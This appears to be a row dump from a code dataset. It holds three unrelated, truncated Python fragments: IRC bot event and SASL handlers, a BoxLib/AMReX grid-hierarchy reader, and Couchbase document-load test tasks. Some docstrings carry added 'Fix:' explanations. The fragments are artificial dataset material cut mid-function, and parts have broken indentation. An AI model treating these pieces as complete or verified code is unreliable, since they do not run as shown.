input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
True
self.event_manager.run_callback("IRC/CTCPQueryReceived", event)
if action.upper() == "ACTION":
e = general_events.ActionReceived(
self, user_obj, channel_obj, data
)
e.cancelled = event.cancelled
self.event_manager.run_callback("ActionReceived", e)
if e.printable:
self.log.info(u"* %s:%s %s" % (user_obj, channel_obj, data))
else:
self.log.info(u"[{} {}] {}".format(
user.split("!", 1)[0], message[0], message[1] or ""
))
if not event.cancelled:
# Call super() to handle specific commands appropriately
irc.IRCClient.ctcpQuery(self, user, channel, messages)
# endregion
# region User events
#######################################################################
# Handlers for things such as users joining/parting channels. #
#######################################################################
def userJoined(self, user, channel):
    """Fired when another user joins a channel we occupy."""
    self.log.info(_("%s joined %s") % (user.nickname, channel))
    # Note: User tracking is done in irc_JOIN rather than here
    join_event = irc_events.UserJoinedEvent(self, channel, user)
    self.event_manager.run_callback("IRC/UserJoined", join_event)
def userLeft(self, user, channel):
    """Fired when another user parts a channel we occupy."""
    self.log.info(_("%s parted %s") % (user, channel))
    # Resolve tracking objects, then update user-tracking state before
    # firing the event.
    parted_chan = self.get_channel(channel)
    parted_user = self.get_user(nickname=user)
    self.user_channel_part(parted_user, parted_chan)
    part_event = irc_events.UserPartedEvent(self, parted_chan, parted_user)
    self.event_manager.run_callback("IRC/UserParted", part_event)
def userKicked(self, kickee, channel, kicker, message):
    """Fired when a user (not us) is kicked from a channel we occupy."""
    self.log.info(_("%s was kicked from %s by %s: %s") % (
        kickee, channel, kicker, message))
    target = self.get_user(nickname=kickee)
    source = self.get_user(nickname=kicker)
    chan = self.get_channel(channel)
    # Drop the kicked user from our channel tracking first.
    self.user_channel_part(target, chan)
    kick_event = irc_events.UserKickedEvent(
        self, chan, target, source, message
    )
    self.event_manager.run_callback("IRC/UserKicked", kick_event)
def irc_QUIT(self, user, params):
    """Fired when another user quits the network entirely."""
    quit_message = params[0]
    self.log.info(_("%s has left IRC: %s") % (user, quit_message))
    # Remove the user from every channel we share with them. Iterate a
    # snapshot, since user_channel_part mutates the membership set.
    quitter = self.get_user(fullname=user)
    for chan in set(quitter.channels):
        self.user_channel_part(quitter, chan)
    quit_event = irc_events.UserQuitEvent(self, quitter, quit_message)
    self.event_manager.run_callback("IRC/UserQuit", quit_event)
    disc_event = general_events.UserDisconnected(self, quitter)
    self.event_manager.run_callback("UserDisconnected", disc_event)
# endregion
# region Channel events
#######################################################################
# Handlers for things such as channel mode changes and topic changes. #
#######################################################################
def modeChanged(self, user, channel, action, modes, args):
    """
    Called when someone changes a mode. Action is a bool specifying
    whether the mode was being set or unset.
    If it's a usermode, channel is the user being changed.
    Note: If it's a user-mode, channel_obj is set to None. Eventually, this
    method should be placed elsewhere and call user/channelModeChanged()
    instead.
    """
    self.log.info(_("%s sets mode %s: %s%s %s") % (
        user, channel, "+" if action else "-", modes,
        " ".join([str(x) for x in args if x is not None])
    ))
    # Get user/channel objects
    try:
        user_obj = self._get_user_from_user_string(user)
    except Exception:
        # Mode change from the server itself and things
        self.log.trace(_("Mode change from irregular user: %s") % user)
        user_obj = User(self, nickname=user, is_tracked=False)
    # Note: Unlike in privmsg/notice/ctcpQuery, channel_obj = None when
    # the target is ourself, rather than a user object. Perhaps this should
    # be changed for clarity?
    channel_obj = None
    if not self.utils.compare_nicknames(self.get_nickname(), channel):
        channel_obj = self.get_channel(channel)
    # Handle the mode changes, one mode character at a time.
    for x in xrange(len(modes)):
        if channel_obj is None:
            # User mode (almost definitely always ourselves)
            # TODO: Handle this (usermodes)
            # Unsure how to handle this - is len(args) == len(modes)?
            pass
        elif modes[x] in self.ranks.modes:
            # Rank channel mode (op/voice-style modes with a nick argument).
            # NOTE(review): this rebinds user_obj (the mode *setter*) to the
            # mode *target*, so the ModeChangedEvent below may carry the last
            # rank-mode target rather than the setter - confirm intended.
            user_obj = self.get_user(args[x])
            if user_obj:
                rank = self.ranks.by_mode(modes[x])
                if action:
                    # action True means the mode was set: grant the rank.
                    user_obj.add_rank_in_channel(channel, rank)
                else:
                    user_obj.remove_rank_in_channel(channel, rank)
            else:
                self.log.warning(
                    _("Rank mode %s set on invalid user %s in channel %s")
                    % (modes[x], args[x], channel))
        else:
            # Other channel mode - stored directly on the channel object.
            if action:
                channel_obj.set_mode(modes[x], args[x])
            else:
                channel_obj.remove_mode(modes[x])
    event = irc_events.ModeChangedEvent(self, user_obj, channel_obj,
                                        action, modes, args)
    self.event_manager.run_callback("IRC/ModeChanged", event)
def topicUpdated(self, user, channel, newTopic):
    """Fired on a topic change - also fired once when we join a channel."""
    self.log.info(
        _("Topic for %s: %s (set by %s)") % (channel, newTopic, user)
    )
    # Fall back to untracked stand-ins when the setter or channel is
    # unknown to our tracking (e.g. topic burst on join).
    setter = self.get_user(nickname=user)
    if not setter:
        setter = User(self, nickname=user, is_tracked=False)
    chan = self.get_channel(channel)
    if not chan:
        chan = Channel(self, channel)
    topic_event = irc_events.TopicUpdatedEvent(self, chan, setter, newTopic)
    self.event_manager.run_callback("IRC/TopicUpdated", topic_event)
# endregion
# region Lower-level event handling
#######################################################################
# Lower-level event handling. For example, irc_JOIN is called for #
# every JOIN message received, not just ones about other users. These #
# typically call the ones above, such as joined() and useJoined(). #
#######################################################################
def irc_JOIN(self, prefix, params):
    """ Called on any join message
    :param prefix: The user joining (full hostmask)
    :param params: The channel(s?) joined
    """
    # irc.IRCClient.irc_JOIN(self, prefix, params)
    # Removed as we can do this better than the library
    # For some reason, userJoined only gives the user's nick, so we do
    # user tracking here
    # There will only ever be one channel, so just get that. No need to
    # iterate.
    channel = params[-1]
    channel_obj = self.get_channel(channel)
    if channel_obj is None:
        # First time we've seen this channel - start tracking it.
        channel_obj = Channel(self, channel)
        self.set_channel(channel, channel_obj)
    nickname, ident, host = self.utils.split_hostmask(prefix)
    # Register the joiner as present in the channel; returns the tracked
    # User object for the event dispatch below.
    user_obj = self.user_join_channel(nickname,
                                      ident,
                                      host,
                                      channel_obj)
    if self.utils.compare_nicknames(nickname, self.get_nickname()):
        # It's us joining the channel.
        # User-tracking stuff
        if self.ourselves is None:
            self.ourselves = user_obj
        # Request a WHO listing so we learn about everyone present.
        self.send_who(channel)
        # Call the self-joined-channel method manually, since we're no
        # longer calling the super method.
        self.joined(channel)
    else:
        # Since we're using our own function and the library doesn't
        # actually do anything with this, we can simply supply the
        # user and channel objects.
        self.userJoined(user_obj, channel_obj)
def irc_NICK(self, prefix, params):
    """Fired when a user changes nickname.
    Twisted provides no high-level handler for this, so handle it here."""
    old_nick = prefix.split("!", 1)[0]
    new_nick = params[0]
    changer = self.get_user(nickname=old_nick)
    if not changer:
        # Untracked user - create a throwaway stand-in.
        changer = User(self, new_nick, is_tracked=False)
    changer.nickname = new_nick
    self.log.info(_("%s is now known as %s") % (old_nick, new_nick))
    rename_event = general_events.NameChanged(self, changer, old_nick)
    self.event_manager.run_callback("NameChanged", rename_event)
# endregion
# region CTCP specific command responses
#######################################################################
# Handlers for specific CTCP commands. These are dynamically found . #
# and called by ctcpQuery() - simply adding one makes it used. #
#######################################################################
def ctcpQuery_VERSION(self, user, channel, data_):
    """Answer a CTCP VERSION query with the running Ultros version."""
    sender = self._get_user_from_user_string(user, False)
    reply = "Ultros v{}".format(__version__)
    self.send_ctcp_reply(sender, "VERSION", reply)
def ctcpQuery_SOURCE(self, user, channel, data_):
    """Answer a CTCP SOURCE query with the project homepage."""
    sender = self._get_user_from_user_string(user, False)
    self.send_ctcp_reply(sender, "SOURCE", "http://ultros.io")
def ctcpQuery_FINGER(self, user, channel, data):
    """Answer a CTCP FINGER query with a random configured response.

    Silently ignores the query when no responses are configured.
    """
    responses = self.fingers
    if not responses:
        return
    sender = self._get_user_from_user_string(user, False)
    self.send_ctcp_reply(sender, "FINGER", random.choice(responses))
# endregion
# region SASL stuff
def sendSASL(self, name, password):
    """Begin a SASL PLAIN authentication exchange.

    The PLAIN mechanism payload is ``authzid\\0authcid\\0password``,
    base64-encoded on a single AUTHENTICATE line.

    Fix: use base64.b64encode() rather than the str.encode("base64")
    codec. That codec wraps its output at 76 characters, so a long
    name/password pair produced *embedded* newlines that .strip() did
    not remove, corrupting the AUTHENTICATE command.
    """
    import base64  # local import: file's import block is not in view

    payload = "%s\0%s\0%s" % (name, name, password)
    self.sendLine("AUTHENTICATE PLAIN")
    self.sendLine("AUTHENTICATE %s" % base64.b64encode(payload))
def irc_CAP(self, prefix, params):
    """Handle a CAP capability-negotiation reply from the server.

    We only care about the "sasl" capability: if the server ACKs it and
    SASL auth is configured, start the SASL exchange; otherwise log an
    error when SASL was expected but is unavailable.

    Fix: the original guarded with ``len(params) < 2`` but then indexed
    ``params[2]``, raising IndexError on a two-element reply. Require
    three elements before indexing.
    """
    self.log.debug("Capability message: %s / %s" % (prefix, params))
    sasl_acked = (
        len(params) >= 3 and
        params[1] == "ACK" and
        params[2].split() == ["sasl"]
    )
    if not sasl_acked:
        if self.identity["authentication"].lower() == "sasl":
            self.log.error(
                "SASL auth requested, but the server doesn't support "
                "it!"
            )
            self.log.error(
                "The bot will not login. Please correct this."
            )
    else:
        if self.identity["authentication"].lower() == "sasl":
            self.sendSASL(
                self.identity["auth_name"], self.identity["auth_pass"]
            )
def irc_900(self, prefix, params):
    """Numeric 900 - "You are now logged in as x" (login confirmation)."""
    # "You are now logged in as x"
    self.log.debug("IRC 900")
    if len(params) > 3:
        # params[3] carries the human-readable confirmation message.
        self.log.info(params[3])
def irc_903(self, prefix, params):
    """Numeric 903 - SASL authentication succeeded."""
    self.log.debug("IRC 903")
    self.log.info(params[1])
    # Auth is done - end capability negotiation so registration continues.
    self.sendLine("CAP END")
def irc_904(self, prefix, params):
    """Numeric 904 - logged as a warning (SASL failure per IRCv3; confirm)."""
    self.log.debug("IRC 904")
    self.log.warn(params[1])
def irc_905(self, prefix, params):
    """Numeric 905 - logged as a warning (SASL error per IRCv3; confirm)."""
    self.log.debug("IRC 905")
    self.log.warn(params[1])
# endregion
# region Other RPL_* handlers
def irc_RPL_WHOREPLY(self, *nargs):
    """ Called when we get a WHO reply from the server.
    I'm seriously wondering if we even need this. """
    data_ = nargs[1]
    # Unpack the WHO reply fields; bail out (with a log) on anything
    # malformed rather than crashing the protocol handler.
    try:
        channel = data_[1]
        ident = data_[2]  # Starts with a ~ if there's no identd present
        host = data_[3]
        server = data_[4]
        nick = data_[5]
        status = data_[6]  # .strip("G").strip("H").strip("*")
        gecos = data_[7]  # Hops, realname
    except Exception:
        self.log.exception("Unable to parse WHO reply")
        return
    # User-tracking stuff
    try:
        chan_obj = self.get_channel(channel)
        self.channel_who_response(nick,
                                  ident,
                                  host,
                                  server,
                                  status,
                                  gecos,
                                  chan_obj)
    except KeyError:
        # We got a WHO reply for a channel we're not in - doesn't matter
        # for user-tracking purposes.
        pass
    else:
        # try/except/else: the event only fires when tracking succeeded.
        user_obj = self.get_user(nickname=nick)
        data_ = {"ident": ident, "host": host, "server": server,
                 "status": status, "gecos": gecos}
        event = irc_events.WHOReplyEvent(self, chan_obj, user_obj, data_)
        self.event_manager.run_callback("IRC/WHOReply", event)
def irc_RPL_ENDOFWHO(self, *nargs):
    """Fired once the server has finished sending WHO replies."""
    reply = nargs[1]
    channel_name = reply[1]
    try:
        chan = self.get_channel(channel_name)
    except KeyError:
        # End-of-WHO for a channel we aren't tracking - nothing to do.
        pass
    else:
        end_event = irc_events.WHOReplyEndEvent(self, chan)
        self.event_manager.run_callback("IRC/EndOfWHO", end_event)
def irc_RPL_ISUPPORT(self, prefix, params):
irc.IRCClient.irc_RPL_ISUPPORT(self, prefix, params)
for param in params[1:-1]:
self.log.trace(_("RPL_ISUPPORT received: %s") % param)
prm = param.split("=")[0].strip("-")
# prm is the param changed - don't bother parsing the value since
# it can be grabbed from self.supported with this:
# self.supported.getFeature(prm)
if prm == "CASEMAPPING":
| |
(float(v) for v in next(header_file).split())
if self.dimensionality > 1:
ylo, yhi = (float(v) for v in next(header_file).split())
else:
ylo, yhi = default_ybounds
if self.dimensionality > 2:
zlo, zhi = (float(v) for v in next(header_file).split())
else:
zlo, zhi = default_zbounds
self.grid_left_edge[grid_counter + gi, :] = [xlo, ylo, zlo]
self.grid_right_edge[grid_counter + gi, :] = [xhi, yhi, zhi]
# Now we get to the level header filename, which we open and parse.
fn = os.path.join(self.dataset.output_dir, next(header_file).strip())
level_header_file = open(fn + "_H")
level_dir = os.path.dirname(fn)
# We skip the first two lines, which contain BoxLib header file
# version and 'how' the data was written
next(level_header_file)
next(level_header_file)
# Now we get the number of components
ncomp_this_file = int(next(level_header_file)) # NOQA
# Skip the next line, which contains the number of ghost zones
next(level_header_file)
# To decipher this next line, we expect something like:
# (8 0
# where the first is the number of FABs in this level.
ngrids = int(next(level_header_file).split()[0][1:])
# Now we can iterate over each and get the indices.
for gi in range(ngrids):
# components within it
start, stop = _our_dim_finder.match(next(level_header_file)).groups()
# fix for non-3d data
# note we append '0' to both ends b/c of the '+1' in dims below
start += ",0" * (3 - self.dimensionality)
stop += ",0" * (3 - self.dimensionality)
start = np.array(start.split(","), dtype="int64")
stop = np.array(stop.split(","), dtype="int64")
dims = stop - start + 1
self.grid_dimensions[grid_counter + gi, :] = dims
self.grid_start_index[grid_counter + gi, :] = start
# Now we read two more lines. The first of these is a close
# parenthesis.
next(level_header_file)
# The next is again the number of grids
next(level_header_file)
# Now we iterate over grids to find their offsets in each file.
for gi in range(ngrids):
# Now we get the data file, at which point we're ready to
# create the grid.
dummy, filename, offset = next(level_header_file).split()
filename = os.path.join(level_dir, filename)
go = self.grid(grid_counter + gi, int(offset), filename, self)
go.Level = self.grid_levels[grid_counter + gi, :] = level
self.grids.append(go)
grid_counter += ngrids
# already read the filenames above...
self.float_type = "float64"
def _cache_endianness(self, test_grid):
    """
    Determine and cache the grid dtype (byte order + bytes per real)
    from a single test grid, assuming all grids match. This is a pretty
    safe assumption since Boxlib uses one file per processor, and if
    you're running on a cluster with different endian processors, then
    you're on your own!
    """
    # The first line of a grid file is its FAB header.
    with open(os.path.expanduser(test_grid.filename), "rb") as fab_file:
        first_line = fab_file.readline().decode("ascii", "ignore")
    pattern = _header_pattern[self.dimensionality - 1]
    bpr, endian, start, stop, centering, nc = pattern.search(first_line).groups()
    # Note that previously we were using a different value for BPR than we
    # use now. Here is an example set of information directly from BoxLib
    """
    * DOUBLE data
    * FAB ((8, (64 11 52 0 1 12 0 1023)),(8, (1 2 3 4 5 6 7 8)))((0,0) (63,63) (0,0)) 27 # NOQA: E501
    * FLOAT data
    * FAB ((8, (32 8 23 0 1 9 0 127)),(4, (1 2 3 4)))((0,0) (63,63) (0,0)) 27
    """
    # Compare bpr against the first/last character of the byte-order
    # group to distinguish little- from big-endian data.
    if bpr == endian[0]:
        dtype = f"<f{bpr}"
    elif bpr == endian[-1]:
        dtype = f">f{bpr}"
    else:
        raise ValueError(
            "FAB header is neither big nor little endian. "
            "Perhaps the file is corrupt?"
        )
    mylog.debug("FAB header suggests dtype of %s", dtype)
    self._dtype = np.dtype(dtype)
def _populate_grid_objects(self):
    """Finalize grids: link parents/children, then prepare each grid."""
    mylog.debug("Creating grid objects")
    self.grids = np.array(self.grids, dtype="object")
    self._reconstruct_parent_child()
    for index, grid_obj in enumerate(self.grids):
        # Progress breadcrumb every 10,000 grids.
        if (index % 1e4) == 0:
            mylog.debug("Prepared % 7i / % 7i grids", index, self.num_grids)
        grid_obj._prepare_grid()
        grid_obj._setup_dx()
    mylog.debug("Done creating grid objects")
def _reconstruct_parent_child(self):
    """Rebuild parent/child grid links from spatial overlap.

    For each grid, find all grids one level finer whose bounding boxes
    overlap it (its children), then invert that mapping in a second
    pass to fill in each child's parent ids.
    """
    if self.max_level == 0:
        # Only one level: no parent/child relationships exist.
        return
    mask = np.empty(len(self.grids), dtype="int32")
    mylog.debug("First pass; identifying child grids")
    for i, grid in enumerate(self.grids):
        # Fills `mask` with nonzero entries for grids at level+1 that
        # intersect this grid's bounding box.
        get_box_grids_level(
            self.grid_left_edge[i, :],
            self.grid_right_edge[i, :],
            self.grid_levels[i] + 1,
            self.grid_left_edge,
            self.grid_right_edge,
            self.grid_levels,
            mask,
        )
        ids = np.where(mask.astype("bool"))  # where is a tuple
        grid._children_ids = ids[0] + grid._id_offset
    mylog.debug("Second pass; identifying parents")
    for i, grid in enumerate(self.grids):  # Second pass
        for child in grid.Children:
            child._parent_id.append(i + grid._id_offset)
def _count_grids(self):
    """Count the total number of grids across all levels.

    Parses the plotfile Header: after seeking past the mesh section and
    skipping the per-level dx/geometry lines, every line with exactly
    three whitespace-separated tokens is a "level ngrids time" record;
    we sum the second token of each.

    We can get everything from the Header file, but note that we're
    duplicating some work done elsewhere. In a future where we don't
    pre-allocate grid arrays, this becomes unnecessary.
    """
    # Use a context manager so the Header file is always closed (the
    # original leaked the file handle).
    with open(self.header_filename) as header_file:
        header_file.seek(self.dataset._header_mesh_start)
        # Skip over the level dxs, geometry and the zero:
        for _ in range(self.dataset._max_level + 3):
            next(header_file)
        # We've seeked, and now we iterate the remainder line by line.
        self.num_grids = 0
        for line in header_file:
            fields = line.split()  # split once, not twice
            if len(fields) != 3:
                continue
            self.num_grids += int(fields[1])
def _initialize_grid_arrays(self):
    """Allocate grid arrays, plus BoxLib's per-grid start indices."""
    super()._initialize_grid_arrays()
    self.grid_start_index = np.zeros((self.num_grids, 3), dtype="int64")
def _initialize_state_variables(self):
    """Override to not re-initialize num_grids in AMRHierarchy.__init__."""
    self._parallel_locking = False
    self._data_file = self._data_mode = None
def _detect_output_fields(self):
    """Build field_list/field_indexes from the parsed header fields."""
    # Field discovery itself happens in _parse_header_file.
    self.field_list = [("boxlib", name) for name in self.dataset._field_list]
    self.field_indexes = {
        field[1]: pos for pos, field in enumerate(self.field_list)
    }
    # field_list may change later; keep an independent copy of the order.
    self.field_order = list(self.field_list)
def _setup_data_io(self):
    """Instantiate the IO handler registered for this dataset type."""
    io_class = io_registry[self.dataset_type]
    self.io = io_class(self.dataset)
def _determine_particle_output_type(self, directory_name):
    """Return the particle-header parser class for *directory_name*.

    AMReX-style particle output writes a first Header line beginning
    with "Version_Two"; older BoxLib output does not.

    Fix: build the Header path with os.path.join instead of "/" string
    concatenation, matching the rest of this file.
    """
    header_filename = os.path.join(
        self.ds.output_dir, directory_name, "Header"
    )
    with open(header_filename) as f:
        version_string = f.readline().strip()
    if version_string.startswith("Version_Two"):
        return AMReXParticleHeader
    return BoxLibParticleHeader
def _read_particles(self, directory_name, is_checkpoint, extra_field_names=None):
    """Parse a particle output directory and attach particle file
    locations/counts to each grid.

    :param directory_name: particle directory under ds.output_dir
    :param is_checkpoint: passed through to the particle header parser
    :param extra_field_names: optional extra fields for the parser
    """
    pheader = self._determine_particle_output_type(directory_name)
    self.particle_headers[directory_name] = pheader(
        self.ds, directory_name, is_checkpoint, extra_field_names
    )
    num_parts = self.particle_headers[directory_name].num_particles
    if self.ds._particle_type_counts is None:
        self.ds._particle_type_counts = {}
    self.ds._particle_type_counts[directory_name] = num_parts
    base = os.path.join(self.ds.output_dir, directory_name)
    # Particle data files use either 4- or 5-digit suffixes; probe which.
    if len(glob.glob(os.path.join(base, "Level_?", "DATA_????"))) > 0:
        base_particle_fn = os.path.join(base, "Level_%d", "DATA_%.4d")
    elif len(glob.glob(os.path.join(base, "Level_?", "DATA_?????"))) > 0:
        base_particle_fn = os.path.join(base, "Level_%d", "DATA_%.5d")
    else:
        # No recognizable particle data files; nothing to attach.
        return
    gid = 0
    # Walk the header's level/file map; gid increments in lockstep,
    # assuming entries appear in the same order as self.grids.
    for lev, data in self.particle_headers[directory_name].data_map.items():
        for pdf in data.values():
            pdict = self.grids[gid]._pdata
            pdict[directory_name] = {}
            pdict[directory_name]["particle_filename"] = base_particle_fn % (
                lev,
                pdf.file_number,
            )
            pdict[directory_name]["offset"] = pdf.offset
            pdict[directory_name]["NumberOfParticles"] = pdf.num_particles
            self.grid_particle_count[gid] += pdf.num_particles
            self.grids[gid].NumberOfParticles += pdf.num_particles
            gid += 1
    # add particle fields to field_list
    pfield_list = self.particle_headers[directory_name].known_fields
    self.field_list.extend(pfield_list)
class BoxlibDataset(Dataset):
"""
This class is a stripped down class that simply reads and parses
*filename*, without looking at the Boxlib index.
"""
_index_class = BoxlibHierarchy
_field_info_class = BoxlibFieldInfo
_output_prefix = None
_default_cparam_filename = "job_info"
_periodicity = (False, False, False)
def __init__(
    self,
    output_dir,
    cparam_filename=None,
    fparam_filename=None,
    dataset_type="boxlib_native",
    storage_filename=None,
    units_override=None,
    unit_system="cgs",
    default_species_fields=None,
):
    """
    The paramfile is usually called "inputs"
    and there may be a fortran inputs file usually called "probin";
    *output_dir* here will be a directory name,
    as per BoxLib. dataset_type will be Native (implemented here), IEEE (not
    yet implemented) or ASCII (not yet implemented.)
    """
    self.fluid_types += ("boxlib",)
    self.output_dir = os.path.abspath(os.path.expanduser(output_dir))
    # Fall back to the class default when no cparam filename is given.
    cparam_filename = cparam_filename or self.__class__._default_cparam_filename
    self.cparam_filename = self._lookup_cparam_filepath(
        output_dir, cparam_filename=cparam_filename
    )
    self.fparam_filename = self._localize_check(fparam_filename)
    self.storage_filename = storage_filename
    Dataset.__init__(
        self,
        output_dir,
        dataset_type,
        units_override=units_override,
        unit_system=unit_system,
        default_species_fields=default_species_fields,
    )
    # These are still used in a few places.
    if "HydroMethod" not in self.parameters.keys():
        self.parameters["HydroMethod"] = "boxlib"
    self.parameters["Time"] = 1.0  # default unit is 1...
    self.parameters["EOSType"] = -1  # default
    self.parameters["gamma"] = self.parameters.get("materials.gamma", 1.6667)
def _localize_check(self, fn):
    """Resolve *fn* relative to the output dir's parent; None if absent."""
    if fn is None:
        return None
    # If the file exists, use it. If not, return None.
    candidate = os.path.join(os.path.dirname(self.output_dir), fn)
    return candidate if os.path.exists(candidate) else None
@classmethod
def _is_valid(cls, filename, *args, cparam_filename=None, **kwargs):
    """Check whether *filename* is a directory holding a BoxLib dataset.

    A Header file must exist inside it. For the BoxLib base class the
    check stops there; subclasses additionally require their
    ``_subtype_keyword`` to appear (case-insensitively) in the cparam
    file.

    Fix: the original left the cparam file open via
    ``open(...).readlines()``; read it under a context manager, and scan
    lazily with any() instead of materializing every lowercased line.
    """
    output_dir = filename
    header_filename = os.path.join(output_dir, "Header")
    # boxlib datasets are always directories, and
    # We *know* it's not boxlib if Header doesn't exist.
    if not os.path.exists(header_filename):
        return False
    if cls is BoxlibDataset:
        # Stop checks here for the boxlib base class.
        # Further checks are performed on subclasses.
        return True
    cparam_filename = cparam_filename or cls._default_cparam_filename
    cparam_filepath = cls._lookup_cparam_filepath(output_dir, cparam_filename)
    if cparam_filepath is None:
        return False
    with open(cparam_filepath) as f:
        return any(cls._subtype_keyword in line.lower() for line in f)
@classmethod
def _lookup_cparam_filepath(cls, output_dir, cparam_filename):
lookup_table = [
os.path.abspath(os.path.join(p, cparam_filename))
for p in (output_dir, | |
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = []
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
self.print_ops_rate_tasks = list()
if self.buckets:
for bucket in self.buckets:
print_ops_rate_task = PrintOpsRate(self.cluster, bucket)
self.print_ops_rate_tasks.append(print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
else:
print_ops_rate_task = PrintOpsRate(self.cluster, self.bucket)
self.print_ops_rate_tasks.append(print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
self.log.info("Items loaded in task {} are {}"
.format(task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < task.generator._doc_gen.end - task.generator._doc_gen.start and i < 60:
self.log.error("Bug in java Futures task. Items loaded in task {} is {}".format(task.thread_name, task.docs_loaded))
sleep(1)
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.fail.update(task.fail)
self.success.update(task.success)
if task.fail.__len__() != 0:
target_log = self.test_log.error
else:
target_log = self.test_log.debug
target_log("Failed to load {} docs from {} to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate and hasattr(self, "print_ops_rate_tasks"):
for print_ops_rate_task in self.print_ops_rate_tasks:
print_ops_rate_task.end_task()
self.task_manager.get_task_result(print_ops_rate_task)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.info("Task '{0}' complete. Loaded {1} items"
.format(task.thread_name, task.docs_loaded))
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
    """Slice *generator* across process_concurrency and build one
    batched LoadDocumentsTask per slice."""
    batched_gens = []
    tasks = []
    gen_start = int(generator.start)
    gen_end = max(int(generator.end), 1)
    span = max(
        int((generator.end - generator.start) / self.process_concurrency),
        1)
    # Carve the generator range into contiguous slices of `span` docs.
    for pos in range(gen_start, gen_end, span):
        slice_gen = copy.deepcopy(generator)
        slice_gen.start = pos
        slice_gen.itr = pos
        # Clamp the final slice to the generator's true end.
        slice_gen.end = min(pos + span, generator.end)
        batched_gens.append(
            BatchedDocumentGenerator(slice_gen, self.batch_size))
    # One task per slice, each bound to its own SDK client.
    for idx, batch_gen in enumerate(batched_gens):
        tasks.append(LoadDocumentsTask(
            self.cluster, self.bucket, self.clients[idx], batch_gen,
            self.op_type, self.exp, self.exp_unit, self.flag,
            persist_to=self.persit_to, replicate_to=self.replicate_to,
            time_unit=self.time_unit, batch_size=self.batch_size,
            pause_secs=self.pause_secs, timeout_secs=self.timeout_secs,
            compression=self.compression,
            durability=self.durability,
            task_identifier=self.task_identifier,
            skip_read_on_error=self.skip_read_on_error))
    return tasks
class LoadSubDocumentsGeneratorsTask(Task):
    """Fans sub-document load generators out across SDK clients, running
    one LoadSubDocumentsTask per generator slice and aggregating the
    per-task success/fail maps."""

    def __init__(self, cluster, task_manager, bucket, clients,
                 generators,
                 op_type, exp, create_paths=False,
                 xattr=False, exp_unit="seconds", flag=0,
                 persist_to=0, replicate_to=0, time_unit="seconds",
                 only_store_hash=True, batch_size=1, pause_secs=1,
                 timeout_secs=5, compression=True,
                 process_concurrency=8,
                 print_ops_rate=True, retries=5, durability="",
                 task_identifier=""):
        thread_name = "SubDocumentsLoadGenTask_{}_{}_{}_{}_{}" \
            .format(task_identifier,
                    bucket.name,
                    op_type,
                    durability,
                    time.time())
        super(LoadSubDocumentsGeneratorsTask, self).__init__(thread_name)
        self.cluster = cluster
        self.exp = exp
        self.create_path = create_paths
        self.xattr = xattr
        self.exp_unit = exp_unit
        self.flag = flag
        # NOTE: "persit_to" typo is preserved; it is read back under the
        # same name in get_tasks() below.
        self.persit_to = persist_to
        self.replicate_to = replicate_to
        self.time_unit = time_unit
        self.only_store_hash = only_store_hash
        self.pause_secs = pause_secs
        self.timeout_secs = timeout_secs
        self.compression = compression
        self.process_concurrency = process_concurrency
        self.clients = clients
        self.task_manager = task_manager
        self.batch_size = batch_size
        self.generators = generators
        self.input_generators = generators
        self.op_types = None
        self.buckets = None
        self.print_ops_rate = print_ops_rate
        self.retries = retries
        self.durability = durability
        # op_type/bucket may each be a single value or a list (one entry
        # per generator); normalise into the matching attribute.
        if isinstance(op_type, list):
            self.op_types = op_type
        else:
            self.op_type = op_type
        if isinstance(bucket, list):
            self.buckets = bucket
        else:
            self.bucket = bucket
        self.num_loaded = 0
        self.fail = {}
        self.success = {}

    def call(self):
        """Entry point: validate inputs, spawn subtasks, gather results."""
        self.start_task()
        # Sanity checks: list-valued op_type/bucket must match generators.
        if self.op_types:
            if len(self.op_types) != len(self.generators):
                self.set_exception(
                    Exception("Not all generators have op_type!"))
                self.complete_task()
        if self.buckets:
            if len(self.op_types) != len(self.buckets):
                self.set_exception(
                    Exception(
                        "Not all generators have bucket specified!"))
                self.complete_task()
        iterator = 0
        tasks = []
        for generator in self.generators:
            if self.op_types:
                self.op_type = self.op_types[iterator]
            if self.buckets:
                self.bucket = self.buckets[iterator]
            tasks.extend(self.get_tasks(generator))
            iterator += 1
        if self.print_ops_rate:
            # Start one ops-rate printer per involved bucket.
            self.print_ops_rate_tasks = []
            if self.buckets:
                for bucket in self.buckets:
                    print_ops_rate_task = PrintOpsRate(self.cluster,
                                                       bucket)
                    self.print_ops_rate_tasks.append(
                        print_ops_rate_task)
                    self.task_manager.add_new_task(print_ops_rate_task)
            else:
                print_ops_rate_task = PrintOpsRate(self.cluster,
                                                   self.bucket)
                self.print_ops_rate_tasks.append(print_ops_rate_task)
                self.task_manager.add_new_task(print_ops_rate_task)
        try:
            for task in tasks:
                self.task_manager.add_new_task(task)
            for task in tasks:
                try:
                    self.task_manager.get_task_result(task)
                except Exception as e:
                    self.log.error(e)
                finally:
                    # Aggregate per-task outcomes regardless of errors.
                    self.fail.update(task.fail)
                    self.success.update(task.success)
                    self.log.debug("Failed to load {} sub_docs from {} "
                                   "to {}"
                                   .format(task.fail.__len__(),
                                           task.generator._doc_gen.start,
                                           task.generator._doc_gen.end))
        except Exception as e:
            self.log.error(e)
            self.set_exception(e)
        finally:
            # Tear down ops-rate printers, stop subtasks, close clients.
            if self.print_ops_rate and hasattr(self,
                                               "print_ops_rate_tasks"):
                for print_ops_rate_task in self.print_ops_rate_tasks:
